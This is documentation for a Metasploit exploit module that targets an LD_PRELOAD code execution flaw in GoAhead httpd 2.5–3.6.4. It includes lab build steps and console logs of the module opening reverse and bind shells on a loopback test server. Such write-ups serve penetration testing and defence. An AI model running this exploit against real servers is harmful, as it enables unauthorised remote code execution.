## Vulnerable Application

  The GoAhead httpd server between versions 2.5 and 3.6.4 are vulnerable to an arbitrary code execution
  vulnerability where a remote attacker can force a supplied shared library to be loaded into the process
  of a CGI application. This module delivers a shared library payload as the raw data to a POST request
  and forces this to be loaded by specifying a `LD_PRELOAD` value of `/proc/self/fd/0`.

### Kali 2017.3 and Ubuntu 16.04 Install Instructions

These instructions are based on the vulerability analysis by [elttam.com.au](https://www.elttam.com.au/blog/goahead/)

```
git clone https://github.com/embedthis/goahead.git
cd goahead/
git checkout tags/v3.6.4 -q
make > /dev/null
cd test
gcc ./cgitest.c -o cgi-bin/cgitest
../build/linux-x64-default/bin/goahead . 127.1.1.1:8080
```

## Verification Steps

  Example steps in this format (is also in the PR):

  1. Install the application
  2. Start msfconsole
  3. Do: ```use exploit/linux/http/goahead_ldpreload```
  4. Do: ```set rhost [ip]```
  5. Do: ```exploit```
  6. You should get a shell.

## Options

  **TARGET_URI**

  Optional. The full path to a CGI endpoint on the target server.

## Scenarios

### GoAhead 3.6.4 on Ubuntu 16.04 x64

```

msf> use exploit/linux/http/goahead_preload
msf exploit(goahead_ldpreload) > set RHOST 127.1.1.1
msf exploit(goahead_ldpreload) > set RPORT 8080
msf exploit(goahead_ldpreload) > check

[*] Searching 390 paths for an exploitable CGI endpoint...
[+] Exploitable CGI located at /cgi-bin/cgitest
[+] 127.1.1.1:8080 The target is vulnerable.

msf exploit(goahead_ldpreload) > exploit

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444
[*] Searching 390 paths for an exploitable CGI endpoint...
[+] Exploitable CGI located at /cgi-bin/cgitest
[*] Command shell session 4 opened (127.0.0.1:4444 -> 127.0.0.1:32988) at 2017-12-28 16:26:50 -0600

uname -a
Linux smash 4.4.0-96-generic #119-Ubuntu SMP Tue Sep 12 14:59:54 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
exit

msf exploit(goahead_ldpreload) > set TARGET 1
msf exploit(goahead_ldpreload) > unset PAYLOAD
msf exploit(goahead_ldpreload) > exploit

[*] Started bind handler
[*] Searching 390 paths for an exploitable CGI endpoint...
[+] Exploitable CGI located at /cgi-bin/cgitest
[*] Command shell session 5 opened (127.0.0.1:30836 -> 127.1.1.1:4444) at 2017-12-28 16:28:04 -0600

uname -a
Linux smash 4.4.0-96-generic #119-Ubuntu SMP Tue Sep 12 14:59:54 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
exit

msf exploit(goahead_ldpreload) > set TARGET 2
msf exploit(goahead_ldpreload) > unset PAYLOAD
msf exploit(goahead_ldpreload) > exploit

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP double handler on 127.0.0.1:4444
[*] Searching 390 paths for an exploitable CGI endpoint...
[+] Exploitable CGI located at /cgi-bin/cgitest
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo sNRXNjxWl7ic0uWw;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "sNRXNjxWl7ic0uWw\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 6 opened (127.0.0.1:4444 -> 127.0.0.1:32995) at 2017-12-28 16:28:56 -0600

uname -a
Linux smash 4.4.0-96-generic #119-Ubuntu SMP Tue Sep 12 14:59:54 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux


msf exploit(goahead_ldpreload) > set TARGET 4
msf exploit(goahead_ldpreload) > unset PAYLOAD
msf exploit(goahead_ldpreload) > exploit

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444
[*] Searching 390 paths for an exploitable CGI endpoint...
[+] Exploitable CGI located at /cgi-bin/cgitest
[*] Command shell session 7 opened (127.0.0.1:4444 -> 127.0.0.1:33000) at 2017-12-28 16:29:34 -0600

uname -a
Linux smash 4.4.0-96-generic #119-Ubuntu SMP Tue Sep 12 14:59:54 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

```


## Logging

Each 404 error will generate a console or log entry similar to `goahead: 0: Cannot find CGI program:`.
